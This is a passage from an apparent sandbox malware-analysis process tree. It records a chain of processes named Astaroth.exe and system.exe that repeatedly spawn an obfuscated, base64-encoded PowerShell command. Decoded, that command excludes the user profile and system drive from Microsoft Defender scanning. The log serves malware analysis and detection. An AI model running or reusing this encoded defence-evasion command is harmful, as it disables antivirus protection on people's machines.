        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7424
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        23⤵
        
        PID:7440
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        23⤵
        
        PID:7448
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7784
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        24⤵
        
        PID:7800
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        24⤵
        
        PID:7808
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8184
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        25⤵
        
        PID:6400
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        25⤵
        
        PID:4696
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7368
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        26⤵
        
        PID:8000
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        26⤵
        
        PID:8012
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7684
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        27⤵
        
        PID:8092
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        27⤵
        
        PID:8160
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8368
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        28⤵
        
        PID:8376
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        28⤵
        
        PID:8400
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8684
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        29⤵
        
        PID:8692
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        29⤵
        
        PID:8708
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9032
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        30⤵
        
        PID:9040
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        30⤵
        
        PID:9048
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7896
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        31⤵
        
        PID:7372
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        31⤵
        
        PID:7592
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8780
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        32⤵
        
        PID:9060
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        32⤵
        
        PID:8496
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8920
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        33⤵
        
        PID:9096
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        33⤵
        
        PID:8992
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        34⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9424
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        34⤵
        
        PID:9432
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        34⤵
        
        PID:9440
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9736
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        35⤵
        
        PID:9752
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        35⤵
        
        PID:9760
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        36⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10008
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        36⤵
        
        PID:10016
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        36⤵
        
        PID:10024
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8816
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        37⤵
        
        PID:7212
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        37⤵
        
        PID:7656
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10216
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        38⤵
        
        PID:10168
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        38⤵
        
        PID:10176
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3100
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        39⤵
        
        PID:248
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        39⤵
        
        PID:2632
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        40⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9572
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        40⤵
        
        PID:7300
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        40⤵
        
        PID:1932
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3368
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        41⤵
        
        PID:8556
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        41⤵
        
        PID:9256
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        42⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4808
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        42⤵
        
        PID:5780
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        42⤵
        
        PID:4472
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        43⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1116
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        43⤵
        
        PID:2292
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        43⤵
        
        PID:9416
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        44⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5696
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        44⤵
        
        PID:9328
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        44⤵
        
        PID:6664
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10420
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        45⤵
        
        PID:10428
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        45⤵
        
        PID:10436
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        46⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10756
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        46⤵
        
        PID:10768
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        46⤵
        
        PID:10776
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        47⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:11056
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        47⤵
        
        PID:11092
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        47⤵
        
        PID:11100
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        48⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10304
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        48⤵
        
        PID:5516
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        48⤵
        
        PID:5424
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        49⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8036
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        49⤵
        
        PID:5848
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        49⤵
        
        PID:5960
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
